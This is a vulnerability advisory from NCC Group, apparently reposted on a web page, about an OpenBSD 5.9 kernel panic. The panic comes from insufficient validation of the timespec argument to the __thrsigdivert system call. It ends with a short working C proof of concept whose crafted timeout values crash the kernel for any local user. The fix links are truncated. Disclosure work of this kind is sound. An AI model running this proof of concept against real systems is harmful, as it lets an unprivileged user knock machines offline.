|
#ifdef BUG_WRITEUP //---------------------------------------------------
__thrsigdivert validation is insufficient and can lead to a panic.
Impact:
Any user can panic the OpenBSD kernel with the __thrsigdivert system call.
Description:
The __thrsigdivert system call allows a user to sleep for some amount
of time waiting for a signal. The system call validates the user-provided
parameters in sys___thrsigdivert() (kern/kern_sig.c) before calling to
lower layers to implement the sleep:
if (ts.tv_nsec < 0 || ts.tv_nsec >= 1000000000)
timeinvalid = 1;
else {
to_ticks = (long long)hz * ts.tv_sec +
ts.tv_nsec / (tick * 1000);
if (to_ticks > INT_MAX)
to_ticks = INT_MAX;
}
This validation is insufficient. Some values of the user-provided
ts can lead to a negative to_ticks value after conversion. This
condition triggers a panic in timeout_add (kern/kern_timeout.c) when
the to_ticks value is checked to be positive:
if (to_ticks < 0)
panic("timeout_add: to_ticks (%d) < 0", to_ticks);
Reproduction:
Run the attached thrsigdivert_panic.c program. NCC verified that
it causes a panic on OpenBSD 5.9 GENERIC kernel on an x86_64 processor.
NCC Group was able to reproduce this issue on OpenBSD 5.9 release
running amd64.
Recommendation:
Return an error it ts.tv_sec is negative in sys___thrsigdivert.
Check to see if to_ticks is negative in sys___thrsigdivert
(kern/kern_sig.c) and, if so, saturate its value at INT_MAX, since
this indicates an overly large value.
Reported: 2016-07-05
Fixed: http:
http:
http:
http:
http:
http:
#endif // BUG_WRITEUP ---------------------------------------------------
#include <stdio.h>
#include <sys/signal.h>
int __thrsigdivert(sigset_t set, siginfo_t *info, const struct timespec *timeout);
int
main(int argc, char **argv)
{
struct timespec tsp = { 0x687327fff5612f21, 0x63760a};
siginfo_t info;
__thrsigdivert(1, &info, &tsp);
printf("nothing happened!\n");
return 0;
}
|
推荐
评论(0条)
